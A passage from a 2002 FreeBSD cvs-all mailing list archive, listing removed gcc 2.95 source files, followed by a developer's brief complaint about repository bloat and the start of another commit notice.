src/contrib/gcc.295/cp/search.c (dead) 1.2 +0 -1393 src/contrib/gcc.295/cp/semantics.c (dead) 1.2 +0 -1049 src/contrib/gcc.295/cp/sig.c (dead) 1.2 +0 -455 src/contrib/gcc.295/cp/spew.c (dead) 1.2 +0 -134 src/contrib/gcc.295/cp/tinfo.cc (dead) 1.2 +0 -55 src/contrib/gcc.295/cp/tinfo.h (dead) 1.2 +0 -300 src/contrib/gcc.295/cp/tinfo2.cc (dead) 1.2 +0 -1995 src/contrib/gcc.295/cp/tree.c (dead) 1.2 +0 -7615 src/contrib/gcc.295/cp/typeck.c (dead) 1.2 +0 -1681 src/contrib/gcc.295/cp/typeck2.c (dead) 1.2 +0 -840 src/contrib/gcc.295/cp/xref.c (dead) 1.2 +0 -3001 src/contrib/gcc.295/cplus-dem.c (dead) 1.2 +0 -1 src/contrib/gcc.295/cpp.1 (dead) 1.2 +0 -41 src/contrib/gcc.295/cpp.in (dead) 1.2 +0 -2856 src/contrib/gcc.295/cpp.texi (dead) 1.2 +0 -64 src/contrib/gcc.295/cppalloc.c (dead) 1.2 +0 -128 src/contrib/gcc.295/cpperror.c (dead) 1.2 +0 -997 src/contrib/gcc.295/cppexp.c (dead) 1.2 +0 -1605 src/contrib/gcc.295/cppfiles.c (dead) 1.2 +0 -214 src/contrib/gcc.295/cpphash.c (dead) 1.2 +0 -38 src/contrib/gcc.295/cpphash.h (dead) 1.2 +0 -1778 src/contrib/gcc.295/cppinit.c (dead) 1.2 +0 -7527 src/contrib/gcc.295/cpplib.c (dead) 1.2 +0 -651 src/contrib/gcc.295/cpplib.h (dead) 1.2 +0 -100 src/contrib/gcc.295/cppmain.c (dead) 1.2 +0 -234 src/contrib/gcc.295/cppspec.c (dead) 1.2 +0 -26 src/contrib/gcc.295/cppulp.c (dead) 1.2 +0 -27 src/contrib/gcc.295/cross-make (dead) 1.2 +0 -324 src/contrib/gcc.295/crtstuff.c (dead) 1.2 +0 -8779 src/contrib/gcc.295/cse.c (dead) 1.2 +0 -1 src/contrib/gcc.295/cstamp-h.in (dead) 1.5 +0 -2731 src/contrib/gcc.295/dbxout.c (dead) 1.2 +0 -33 src/contrib/gcc.295/dbxout.h (dead) 1.2 +0 -17 src/contrib/gcc.295/dbxstclass.h (dead) 1.2 +0 -143 src/contrib/gcc.295/defaults.h (dead) 1.2 +0 -108 src/contrib/gcc.295/demangle.h (dead) 1.2 +0 -286 src/contrib/gcc.295/doprint.c (dead) 1.2 +0 -360 src/contrib/gcc.295/doschk.c (dead) 1.2 +0 -2 src/contrib/gcc.295/dostage2 (dead) 1.2 +0 -3 src/contrib/gcc.295/dostage3 (dead) 1.2 +0 -311 src/contrib/gcc.295/dwarf.h (dead) 1.2 +0 -548 src/contrib/gcc.295/dwarf2.h (dead) 1.2 +0 -9884 src/contrib/gcc.295/dwarf2out.c (dead) 1.2 +0 -41 src/contrib/gcc.295/dwarf2out.h (dead) 1.5 +0 -6107 src/contrib/gcc.295/dwarfout.c (dead) 1.2 +0 -40 src/contrib/gcc.295/dwarfout.h (dead) 1.2 +0 -100 src/contrib/gcc.295/dyn-string.c (dead) 1.2 +0 -31 src/contrib/gcc.295/dyn-string.h (dead) 1.2 +0 -125 src/contrib/gcc.295/eh-common.h (dead) 1.2 +0 -3448 src/contrib/gcc.295/emit-rtl.c (dead) 1.2 +0 -2837 src/contrib/gcc.295/enquire.c (dead) 1.2 +0 -2694 src/contrib/gcc.295/except.c (dead) 1.2 +0 -385 src/contrib/gcc.295/except.h (dead) 1.2 +0 -118 src/contrib/gcc.295/exgettext (dead) 1.2 +0 -1218 src/contrib/gcc.295/explow.c (dead) 1.2 +0 -4223 src/contrib/gcc.295/expmed.c (dead) 1.2 +0 -10747 src/contrib/gcc.295/expr.c (dead) 1.2 +0 -854 src/contrib/gcc.295/expr.h (dead) 1.5 +0 -3785 src/contrib/gcc.295/extend.texi (dead) 1.2 +0 -211 src/contrib/gcc.295/f/BUGS (dead) 1.2 +0 -4804 src/contrib/gcc.295/f/ChangeLog (dead) 1.2 +0 -352 src/contrib/gcc.295/f/INSTALL (dead) 1.2 +0 -472 src/contrib/gcc.295/f/Make-lang.in (dead) 1.2 +0 -530 src/contrib/gcc.295/f/Makefile.in (dead) 1.2 +0 -1623 src/contrib/gcc.295/f/NEWS (dead) 1.2 +0 -7 src/contrib/gcc.295/f/README (dead) 1.2 +0 -5 src/contrib/gcc.295/f/RELEASE-PREP (dead) 1.2 +0 -208 src/contrib/gcc.295/f/ansify.c (dead) 1.2 +0 -27 src/contrib/gcc.295/f/assert.j (dead) 1.2 +0 -544 src/contrib/gcc.295/f/bad.c (dead) 1.2 +0 -711 src/contrib/gcc.295/f/bad.def (dead) 1.2 +0 -108 src/contrib/gcc.295/f/bad.h (dead) 1.2 +0 -201 src/contrib/gcc.295/f/bit.c (dead) 1.2 +0 -84 src/contrib/gcc.295/f/bit.h (dead) 1.2 +0 -69 src/contrib/gcc.295/f/bld-op.def (dead) 1.2 +0 -5794 src/contrib/gcc.295/f/bld.c (dead) 1.2 +0 -1024 src/contrib/gcc.295/f/bld.h (dead) 1.2 +0 -341 src/contrib/gcc.295/f/bugs.texi (dead) 1.2 +0 -17 src/contrib/gcc.295/f/bugs0.texi (dead) 1.2 +0 -282 src/contrib/gcc.295/f/com-rt.def (dead) 1.2 +0 -16510 src/contrib/gcc.295/f/com.c (dead) 1.2 +0 -376 src/contrib/gcc.295/f/com.h (dead) 1.2 +0 -37 src/contrib/gcc.295/f/config-lang.in (dead) 1.2 +0 -27 src/contrib/gcc.295/f/config.j (dead) 1.2 +0 -28 src/contrib/gcc.295/f/convert.j (dead) 1.2 +0 -1816 src/contrib/gcc.295/f/data.c (dead) 1.2 +0 -74 src/contrib/gcc.295/f/data.h (dead) 1.2 +0 -1498 src/contrib/gcc.295/f/equiv.c (dead) 1.2 +0 -103 src/contrib/gcc.295/f/equiv.h (dead) 1.2 +0 -19304 src/contrib/gcc.295/f/expr.c (dead) 1.2 +0 -194 src/contrib/gcc.295/f/expr.h (dead) 1.2 +0 -2024 src/contrib/gcc.295/f/ffe.texi (dead) 1.2 +0 -773 src/contrib/gcc.295/f/fini.c (dead) 1.2 +0 -27 src/contrib/gcc.295/f/flags.j (dead) 1.2 +0 -357 src/contrib/gcc.295/f/g77.1 (dead) 1.2 +0 -14999 src/contrib/gcc.295/f/g77.texi (dead) 1.2 +0 -2170 src/contrib/gcc.295/f/g77install.texi (dead) 1.2 +0 -580 src/contrib/gcc.295/f/g77spec.c (dead) 1.2 +0 -28 src/contrib/gcc.295/f/glimits.j (dead) 1.2 +0 -1536 src/contrib/gcc.295/f/global.c (dead) 1.2 +0 -200 src/contrib/gcc.295/f/global.h (dead) 1.2 +0 -27 src/contrib/gcc.295/f/hconfig.j (dead) 1.2 +0 -382 src/contrib/gcc.295/f/implic.c (dead) 1.2 +0 -74 src/contrib/gcc.295/f/implic.h (dead) 1.2 +0 -36 src/contrib/gcc.295/f/info-b.def (dead) 1.2 +0 -37 src/contrib/gcc.295/f/info-k.def (dead) 1.2 +0 -41 src/contrib/gcc.295/f/info-w.def (dead) 1.2 +0 -304 src/contrib/gcc.295/f/info.c (dead) 1.2 +0 -186 src/contrib/gcc.295/f/info.h (dead) 1.2 +0 -27 src/contrib/gcc.295/f/input.j (dead) 1.2 +0 -1336 src/contrib/gcc.295/f/intdoc.c (dead) 1.2 +0 -2519 src/contrib/gcc.295/f/intdoc.in (dead) 1.2 +0 -10745 src/contrib/gcc.295/f/intdoc.texi (dead) 1.2 +0 -2055 src/contrib/gcc.295/f/intrin.c (dead) 1.2 +0 -3351 src/contrib/gcc.295/f/intrin.def (dead) 1.2 +0 -130 src/contrib/gcc.295/f/intrin.h (dead) 1.2 +0 -159 src/contrib/gcc.295/f/lab.c (dead) 1.2 +0 -154 src/contrib/gcc.295/f/lab.h (dead) 1.2 +0 -158 src/contrib/gcc.295/f/lang-options.h (dead) 1.2 +0 -106 src/contrib/gcc.295/f/lang-specs.h (dead) 1.2 +0 -4717 src/contrib/gcc.295/f/lex.c (dead) 1.2 +0 -201 src/contrib/gcc.295/f/lex.h (dead) 1.2 +0 -554 src/contrib/gcc.295/f/malloc.c (dead) 1.2 +0 -183 src/contrib/gcc.295/f/malloc.h (dead) 1.2 +0 -242 src/contrib/gcc.295/f/name.c (dead) 1.2 +0 -109 src/contrib/gcc.295/f/name.h (dead) 1.2 +0 -2330 src/contrib/gcc.295/f/news.texi (dead) 1.2 +0 -14 src/contrib/gcc.295/f/news0.texi (dead) 1.2 +0 -28 src/contrib/gcc.295/f/output.j (dead) 1.2 +0 -95 src/contrib/gcc.295/f/parse.c (dead) 1.2 +0 -68 src/contrib/gcc.295/f/proj.c (dead) 1.2 +0 -83 src/contrib/gcc.295/f/proj.h (dead) 1.2 +0 -40 src/contrib/gcc.295/f/root.texi (dead) 1.2 +0 -28 src/contrib/gcc.295/f/rtl.j (dead) 1.2 +0 -445 src/contrib/gcc.295/f/src.c (dead) 1.2 +0 -144 src/contrib/gcc.295/f/src.h (dead) 1.2 +0 -554 src/contrib/gcc.295/f/st.c (dead) 1.2 +0 -81 src/contrib/gcc.295/f/st.h (dead) 1.2 +0 -2000 src/contrib/gcc.295/f/sta.c (dead) 1.2 +0 -117 src/contrib/gcc.295/f/sta.h (dead) 1.2 +0 -25198 src/contrib/gcc.295/f/stb.c (dead) 1.2 +0 -253 src/contrib/gcc.295/f/stb.h (dead) 1.2 +0 -13898 src/contrib/gcc.295/f/stc.c (dead) 1.2 +0 -360 src/contrib/gcc.295/f/stc.h (dead) 1.2 +0 -6905 src/contrib/gcc.295/f/std.c (dead) 1.2 +0 -298 src/contrib/gcc.295/f/std.h (dead) 1.2 +0 -5419 src/contrib/gcc.295/f/ste.c (dead) 1.2 +0 -168 src/contrib/gcc.295/f/ste.h (dead) 1.2 +0 -573 src/contrib/gcc.295/f/storag.c (dead) 1.2 +0 -167 src/contrib/gcc.295/f/storag.h (dead) 1.2 +0 -59 src/contrib/gcc.295/f/stp.c (dead) 1.2 +0 -508 src/contrib/gcc.295/f/stp.h (dead) 1.2 +0 -135 src/contrib/gcc.295/f/str-1t.fin (dead) 1.2 +0 -60 src/contrib/gcc.295/f/str-2t.fin (dead) 1.2 +0 -55 src/contrib/gcc.295/f/str-fo.fin (dead) 1.2 +0 -43 src/contrib/gcc.295/f/str-io.fin (dead) 1.2 +0 -55 src/contrib/gcc.295/f/str-nq.fin (dead) 1.2 +0 -57 src/contrib/gcc.295/f/str-op.fin (dead) 1.2 +0 -50 src/contrib/gcc.295/f/str-ot.fin (dead) 1.2 +0 -217 src/contrib/gcc.295/f/str.c (dead) 1.2 +0 -85 src/contrib/gcc.295/f/str.h (dead) 1.2 +0 -273 src/contrib/gcc.295/f/sts.c (dead) 1.2 +0 -89 src/contrib/gcc.295/f/sts.h (dead) 1.2 +0 -1044 src/contrib/gcc.295/f/stt.c (dead) 1.2 +0 -230 src/contrib/gcc.295/f/stt.h (dead) 1.2 +0 -1161 src/contrib/gcc.295/f/stu.c (dead) 1.2 +0 -69 src/contrib/gcc.295/f/stu.h (dead) 1.2 +0 -66 src/contrib/gcc.295/f/stv.c (dead) 1.2 +0 -165 src/contrib/gcc.295/f/stv.h (dead) 1.2 +0 -428 src/contrib/gcc.295/f/stw.c (dead) 1.2 +0 -184 src/contrib/gcc.295/f/stw.h (dead) 1.2 +0 -1477 src/contrib/gcc.295/f/symbol.c (dead) 1.2 +0 -654 src/contrib/gcc.295/f/symbol.def (dead) 1.2 +0 -293 src/contrib/gcc.295/f/symbol.h (dead) 1.2 +0 -27 src/contrib/gcc.295/f/system.j (dead) 1.2 +0 -2564 src/contrib/gcc.295/f/target.c (dead) 1.2 +0 -1865 src/contrib/gcc.295/f/target.h (dead) 1.2 +0 -27 src/contrib/gcc.295/f/tconfig.j (dead) 1.2 +0 -27 src/contrib/gcc.295/f/tm.j (dead) 1.2 +0 -922 src/contrib/gcc.295/f/top.c (dead) 1.2 +0 -264 src/contrib/gcc.295/f/top.h (dead) 1.2 +0 -27 src/contrib/gcc.295/f/toplev.j (dead) 1.2 +0 -28 src/contrib/gcc.295/f/tree.j (dead) 1.2 +0 -107 src/contrib/gcc.295/f/type.c (dead) 1.2 +0 -64 src/contrib/gcc.295/f/type.h (dead) 1.2 +0 -1 src/contrib/gcc.295/f/version.c (dead) 1.2 +0 -6 src/contrib/gcc.295/f/version.h (dead) 1.2 +0 -542 src/contrib/gcc.295/f/where.c (dead) 1.2 +0 -138 src/contrib/gcc.295/f/where.h (dead) 1.11 +0 -4163 src/contrib/gcc.295/final.c (dead) 1.2 +0 -1202 src/contrib/gcc.295/fix-header.c (dead) 1.2 +0 -109 src/contrib/gcc.295/fixcpp (dead) 1.2 +0 -5 src/contrib/gcc.295/fixinc-nt.sed (dead) 1.2 +0 -2528 src/contrib/gcc.295/fixincludes (dead) 1.2 +0 -273 src/contrib/gcc.295/fixproto (dead) 1.5 +0 -546 src/contrib/gcc.295/flags.h (dead) 1.2 +0 -581 src/contrib/gcc.295/floatlib.c (dead) 1.2 +0 -2956 src/contrib/gcc.295/flow.c (dead) 1.2 +0 -5129 src/contrib/gcc.295/fold-const.c (dead) 1.2 +0 -231 src/contrib/gcc.295/fp-test.c (dead) 1.2 +0 -815 src/contrib/gcc.295/frame.c (dead) 1.2 +0 -65 src/contrib/gcc.295/frame.h (dead) 1.10 +0 -7091 src/contrib/gcc.295/function.c (dead) 1.2 +0 -232 src/contrib/gcc.295/function.h (dead) 1.2 +0 -29 src/contrib/gcc.295/future.options (dead) 1.2 +0 -91 src/contrib/gcc.295/gansidecl.h (dead) 1.2 +0 -88 src/contrib/gcc.295/gbl-ctors.h (dead) 1.18 +0 -4275 src/contrib/gcc.295/gcc.1 (dead) 1.26 +0 -5969 src/contrib/gcc.295/gcc.c (dead) 1.2 +0 -4722 src/contrib/gcc.295/gcc.texi (dead) 1.2 +0 -43 src/contrib/gcc.295/gccspec.c (dead) 1.2 +0 -142 src/contrib/gcc.295/gcov-io.h (dead) 1.2 +0 -1375 src/contrib/gcc.295/gcov.c (dead) 1.2 +0 -344 src/contrib/gcc.295/gcov.texi (dead) 1.2 +0 -4758 src/contrib/gcc.295/gcse.c (dead) 1.2 +0 -179 src/contrib/gcc.295/gen-protos.c (dead) 1.2 +0 -432 src/contrib/gcc.295/genattr.c (dead) 1.2 +0 -5715 src/contrib/gcc.295/genattrtab.c (dead) 1.2 +0 -82 src/contrib/gcc.295/gencheck.c (dead) 1.2 +0 -161 src/contrib/gcc.295/gencodes.c (dead) 1.2 +0 -356 src/contrib/gcc.295/genconfig.c (dead) 1.2 +0 -800 src/contrib/gcc.295/genemit.c (dead) 1.2 +0 -556 src/contrib/gcc.295/genextract.c (dead) 1.2 +0 -294 src/contrib/gcc.295/genflags.c (dead) 1.2 +0 -337 src/contrib/gcc.295/gengenrtl.c (dead) 1.2 +0 -231 src/contrib/gcc.295/genmultilib (dead) 1.2 +0 -385 src/contrib/gcc.295/genopinit.c (dead) 1.2 +0 -1000 src/contrib/gcc.295/genoutput.c (dead) 1.2 +0 -509 src/contrib/gcc.295/genpeep.c (dead) 1.2 +0 -1814 src/contrib/gcc.295/genrecog.c (dead) 1.2 +0 -765 src/contrib/gcc.295/getopt.c (dead) 1.2 +0 -129 src/contrib/gcc.295/getopt.h (dead) 1.2 +0 -180 src/contrib/gcc.295/getopt1.c (dead) 1.2 +0 -101 src/contrib/gcc.295/getpwd.c (dead) 1.2 +0 -15 src/contrib/gcc.295/ginclude/iso646.h (dead) 1.2 +0 -461 src/contrib/gcc.295/ginclude/math-3300.h (dead) 1.2 +0 -529 src/contrib/gcc.295/ginclude/math-68881.h (dead) 1.2 +0 -170 src/contrib/gcc.295/ginclude/ppc-asm.h (dead) 1.2 +0 -4 src/contrib/gcc.295/ginclude/proto.h (dead) 1.5 +0 -214 src/contrib/gcc.295/ginclude/stdarg.h (dead) 1.2 +0 -20 src/contrib/gcc.295/ginclude/stdbool.h (dead) 1.4 +0 -344 src/contrib/gcc.295/ginclude/stddef.h (dead) 1.2 +0 -100 src/contrib/gcc.295/ginclude/va-alpha.h (dead) 1.2 +0 -111 src/contrib/gcc.295/ginclude/va-arc.h (dead) 1.2 +0 -34 src/contrib/gcc.295/ginclude/va-c4x.h (dead) 1.2 +0 -57 src/contrib/gcc.295/ginclude/va-clipper.h (dead) 1.2 +0 -53 src/contrib/gcc.295/ginclude/va-h8300.h (dead) 1.2 +0 -211 src/contrib/gcc.295/ginclude/va-i860.h (dead) 1.2 +0 -76 src/contrib/gcc.295/ginclude/va-i960.h (dead) 1.2 +0 -86 src/contrib/gcc.295/ginclude/va-m32r.h (dead) 1.2 +0 -84 src/contrib/gcc.295/ginclude/va-m88k.h (dead) 1.2 +0 -110 src/contrib/gcc.295/ginclude/va-mips.h (dead) 1.2 +0 -37 src/contrib/gcc.295/ginclude/va-mn10200.h (dead) 1.2 +0 -35 src/contrib/gcc.295/ginclude/va-mn10300.h (dead) 1.2 +0 -49 src/contrib/gcc.295/ginclude/va-pa.h (dead) 1.2 +0 -144 src/contrib/gcc.295/ginclude/va-ppc.h (dead) 1.2 +0 -130 src/contrib/gcc.295/ginclude/va-pyr.h (dead) 1.2 +0 -199 src/contrib/gcc.295/ginclude/va-sh.h (dead) 1.2 +0 -203 src/contrib/gcc.295/ginclude/va-sparc.h (dead) 1.2 +0 -61 src/contrib/gcc.295/ginclude/va-spur.h (dead) 1.2 +0 -34 src/contrib/gcc.295/ginclude/va-v850.h (dead) 1.5 +0 -231 src/contrib/gcc.295/ginclude/varargs.h (dead) 1.2 +0 -93 src/contrib/gcc.295/glimits.h (dead) 1.2 +0 -1714 src/contrib/gcc.295/global.c (dead) 1.2 +0 -330 src/contrib/gcc.295/gmon.c (dead) 1.2 +0 -475 src/contrib/gcc.295/graph.c (dead) 1.2 +0 -17 src/contrib/gcc.295/gstab.h (dead) 1.2 +0 -76 src/contrib/gcc.295/gsyms.h (dead) 1.2 +0 -8 src/contrib/gcc.295/gsyslimits.h (dead) 1.2 +0 -150 src/contrib/gcc.295/gthr-dce.h (dead) 1.2 +0 -147 src/contrib/gcc.295/gthr-posix.h (dead) 1.2 +0 -62 src/contrib/gcc.295/gthr-single.h (dead) 1.2 +0 -177 src/contrib/gcc.295/gthr-solaris.h (dead) 1.2 +0 -132 src/contrib/gcc.295/gthr-vxworks.h (dead) 1.2 +0 -99 src/contrib/gcc.295/gthr.h (dead) 1.2 +0 -8738 src/contrib/gcc.295/haifa-sched.c (dead) 1.2 +0 -400 src/contrib/gcc.295/halfpic.c (dead) 1.2 +0 -89 src/contrib/gcc.295/halfpic.h (dead) 1.2 +0 -271 src/contrib/gcc.295/hard-reg-set.h (dead) 1.2 +0 -204 src/contrib/gcc.295/hash.c (dead) 1.2 +0 -130 src/contrib/gcc.295/hash.h (dead) 1.2 +0 -96 src/contrib/gcc.295/hwint.h (dead) 1.2 +0 -47 src/contrib/gcc.295/input.h (dead) 1.2 +0 -2176 src/contrib/gcc.295/install.texi (dead) 1.3 +0 -3500 src/contrib/gcc.295/integrate.c (dead) 1.2 +0 -126 src/contrib/gcc.295/integrate.h (dead) 1.2 +0 -6 src/contrib/gcc.295/intl.c (dead) 1.2 +0 -52 src/contrib/gcc.295/intl.h (dead) 1.10 +0 -6801 src/contrib/gcc.295/invoke.texi (dead) 1.2 +0 -4513 src/contrib/gcc.295/jump.c (dead) 1.2 +0 -39 src/contrib/gcc.295/just-fixinc (dead) 1.2 +0 -799 src/contrib/gcc.295/lcm.c (dead) 1.2 +0 -100 src/contrib/gcc.295/libgcc1-test.c (dead) 1.2 +0 -596 src/contrib/gcc.295/libgcc1.c (dead) 1.5 +0 -4016 src/contrib/gcc.295/libgcc2.c (dead) 1.2 +0 -180 src/contrib/gcc.295/libiberty.h (dead) 1.2 +0 -12 src/contrib/gcc.295/limitx.h (dead) 1.2 +0 -10 src/contrib/gcc.295/limity.h (dead) 1.2 +0 -227 src/contrib/gcc.295/listing (dead) 1.2 +0 -2381 src/contrib/gcc.295/local-alloc.c (dead) 1.2 +0 -1181 src/contrib/gcc.295/longlong.h (dead) 1.2 +0 -6631 src/contrib/gcc.295/loop.c (dead) 1.2 +0 -176 src/contrib/gcc.295/loop.h (dead) 1.2 +0 -119 src/contrib/gcc.295/machmode.def (dead) 1.2 +0 -171 src/contrib/gcc.295/machmode.h (dead) 1.2 +0 -413 src/contrib/gcc.295/makefile.vms (dead) 1.2 +0 -290 src/contrib/gcc.295/mbchar.c (dead) 1.2 +0 -41 src/contrib/gcc.295/mbchar.h (dead) 1.2 +0 -3993 src/contrib/gcc.295/md.texi (dead) 1.2 +0 -1617 src/contrib/gcc.295/mips-tdump.c (dead) 1.2 +0 -5803 src/contrib/gcc.295/mips-tfile.c (dead) 1.2 +0 -17 src/contrib/gcc.295/move-if-change (dead) 1.2 +0 -312 src/contrib/gcc.295/objc/Make-lang.in (dead) 1.2 +0 -91 src/contrib/gcc.295/objc/Makefile.in (dead) 1.2 +0 -97 src/contrib/gcc.295/objc/README (dead) 1.2 +0 -37 src/contrib/gcc.295/objc/config-lang.in (dead) 1.2 +0 -96 src/contrib/gcc.295/objc/lang-specs.h (dead) 1.2 +0 -8455 src/contrib/gcc.295/objc/objc-act.c (dead) 1.2 +0 -117 src/contrib/gcc.295/objc/objc-act.h (dead) 1.2 +0 -37 src/contrib/gcc.295/objc/objc-tree.def (dead) 1.2 +0 -64 src/contrib/gcc.295/objc/objc.gperf (dead) 1.2 +0 -497 src/contrib/gcc.295/obstack.c (dead) 1.2 +0 -516 src/contrib/gcc.295/obstack.h (dead) 1.2 +0 -4320 src/contrib/gcc.295/optabs.c (dead) 1.2 +0 -428 src/contrib/gcc.295/output.h (dead) 1.2 +0 -69 src/contrib/gcc.295/patch-apollo-includes (dead) 1.2 +0 -101 src/contrib/gcc.295/pcp.h (dead) 1.4 +0 -736 src/contrib/gcc.295/pexecute.c (dead) 1.2 +0 -331 src/contrib/gcc.295/prefix.c (dead) 1.2 +0 -28 src/contrib/gcc.295/prefix.h (dead) 1.2 +0 -329 src/contrib/gcc.295/print-rtl.c (dead) 1.5 +0 -698 src/contrib/gcc.295/print-tree.c (dead) 1.2 +0 -1702 src/contrib/gcc.295/profile.c (dead) 1.2 +0 -4732 src/contrib/gcc.295/protoize.c (dead) 1.2 +0 -1 src/contrib/gcc.295/pself.c (dead) 1.2 +0 -1 src/contrib/gcc.295/pself1.c (dead) 1.2 +0 -1 src/contrib/gcc.295/pself2.c (dead) 1.2 +0 -1 src/contrib/gcc.295/pself3.c (dead) 1.2 +0 -2 src/contrib/gcc.295/pself4.c (dead) 1.2 +0 -5 src/contrib/gcc.295/pself5.c (dead) 1.2 +0 -6122 src/contrib/gcc.295/real.c (dead) 1.2 +0 -438 src/contrib/gcc.295/real.h (dead) 1.2 +0 -1981 src/contrib/gcc.295/recog.c (dead) 1.2 +0 -121 src/contrib/gcc.295/recog.h (dead) 1.2 +0 -3134 src/contrib/gcc.295/reg-stack.c (dead) 1.2 +0 -1900 src/contrib/gcc.295/regclass.c (dead) 1.2 +0 -1983 src/contrib/gcc.295/regmove.c (dead) 1.2 +0 -175 src/contrib/gcc.295/regs.h (dead) 1.7 +0 -6816 src/contrib/gcc.295/reload.c (dead) 1.2 +0 -237 src/contrib/gcc.295/reload.h (dead) 1.2 +0 -7176 src/contrib/gcc.295/reload1.c (dead) 1.2 +0 -4397 src/contrib/gcc.295/reorg.c (dead) 1.2 +0 -1289 src/contrib/gcc.295/resource.c (dead) 1.2 +0 -46 src/contrib/gcc.295/resource.h (dead) 1.2 +0 -851 src/contrib/gcc.295/rtl.c (dead) 1.2 +0 -765 src/contrib/gcc.295/rtl.def (dead) 1.2 +0 -968 src/contrib/gcc.295/rtl.h (dead) 1.2 +0 -2801 src/contrib/gcc.295/rtl.texi (dead) 1.2 +0 -1840 src/contrib/gcc.295/rtlanal.c (dead) 1.2 +0 -470 src/contrib/gcc.295/sbitmap.c (dead) 1.2 +0 -122 src/contrib/gcc.295/sbitmap.h (dead) 1.2 +0 -252 src/contrib/gcc.295/scan-decls.c (dead) 1.2 +0 -139 src/contrib/gcc.295/scan-types.sh (dead) 1.2 +0 -240 src/contrib/gcc.295/scan.c (dead) 1.2 +0 -75 src/contrib/gcc.295/scan.h (dead) 1.2 +0 -4968 src/contrib/gcc.295/sched.c (dead) 1.2 +0 -1547 src/contrib/gcc.295/sdbout.c (dead) 1.2 +0 -39 src/contrib/gcc.295/sdbout.h (dead) 1.2 +0 -9 src/contrib/gcc.295/sort-protos (dead) 1.2 +0 -368 src/contrib/gcc.295/splay-tree.c (dead) 1.2 +0 -116 src/contrib/gcc.295/splay-tree.h (dead) 1.2 +0 -232 src/contrib/gcc.295/stab.def (dead) 1.2 +0 -42 src/contrib/gcc.295/stack.h (dead) 1.3 +0 -6137 src/contrib/gcc.295/stmt.c (dead) 1.2 +0 -1243 src/contrib/gcc.295/stor-layout.c (dead) 1.5 +0 -772 src/contrib/gcc.295/stupid.c (dead) 1.2 +0 -1347 src/contrib/gcc.295/sys-protos.h (dead) 1.2 +0 -239 src/contrib/gcc.295/sys-types.h (dead) 1.2 +0 -316 src/contrib/gcc.295/system.h (dead) 1.2 +0 -633 src/contrib/gcc.295/tlink.c (dead) 1.2 +0 -6467 src/contrib/gcc.295/tm.texi (dead) 1.16 +0 -5764 src/contrib/gcc.295/toplev.c (dead) 1.2 +0 -65 src/contrib/gcc.295/toplev.h (dead) 1.2 +0 -4468 src/contrib/gcc.295/tree.c (dead) 1.2 +0 -710 src/contrib/gcc.295/tree.def (dead) 1.2 +0 -1716 src/contrib/gcc.295/tree.h (dead) 1.2 +0 -14 src/contrib/gcc.295/typeclass.h (dead) 1.2 +0 -1 src/contrib/gcc.295/unprotoize.c (dead) 1.2 +0 -3503 src/contrib/gcc.295/unroll.c (dead) 1.2 +0 -4064 src/contrib/gcc.295/varasm.c (dead) 1.2 +0 -70 src/contrib/gcc.295/varray.c (dead) 1.2 +0 -166 src/contrib/gcc.295/varray.h (dead) 1.3 +0 -3 src/contrib/gcc.295/version.c (dead) 1.2 +0 -531 src/contrib/gcc.295/xcoffout.c (dead) 1.2 +0 -180 src/contrib/gcc.295/xcoffout.h (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 11:51:52 2002 Delivered-To: cvs-all@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-56.dsl.lsan03.pacbell.net [63.207.60.56]) by hub.freebsd.org (Postfix) with ESMTP id 3921A37B40C; Tue, 18 Jun 2002 11:51:47 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id B4EFA66B95; Tue, 18 Jun 2002 11:51:46 -0700 (PDT) Date: Tue, 18 Jun 2002 11:51:46 -0700 From: Kris Kennaway To: "David E. O'Brien" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ...) Message-ID: <20020618115146.A82102@xor.obsecurity.org> References: <200206181833.g5IIXqr75460@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="82I3+IH0IqGh5yIs" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206181833.g5IIXqr75460@freefall.freebsd.org>; from obrien@FreeBSD.org on Tue, Jun 18, 2002 at 11:33:52AM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --82I3+IH0IqGh5yIs Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jun 18, 2002 at 11:33:52AM -0700, David E. O'Brien wrote: > obrien 2002/06/18 11:33:50 PDT >=20 > Removed files: > contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog=20 [...] > Log: [... ASCII art deleted ...] Yay, another 680KB added to the repo for no particular reason. Please, people! Kris --82I3+IH0IqGh5yIs Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9D4FBWry0BWjoQKURAvOrAKDk6RjGtyVfVpqpVqiuAbKDeEhzKwCg7WV+ aNJnOJZjhr9T8ZZH0xNeeUI= =mSwC -----END PGP SIGNATURE----- --82I3+IH0IqGh5yIs-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 11:53: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3A08B37B404; Tue, 18 Jun 2002 11:52:52 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IIqqR77608; Tue, 18 Jun 2002 11:52:52 -0700 (PDT) (envelope-from obrien) Message-Id: <200206181852.g5IIqqR77608@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 11:52:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/libobjc.295 ChangeLog Makefile.in NXConstStr.m Object.m Protocol.m README README.threads THREADS 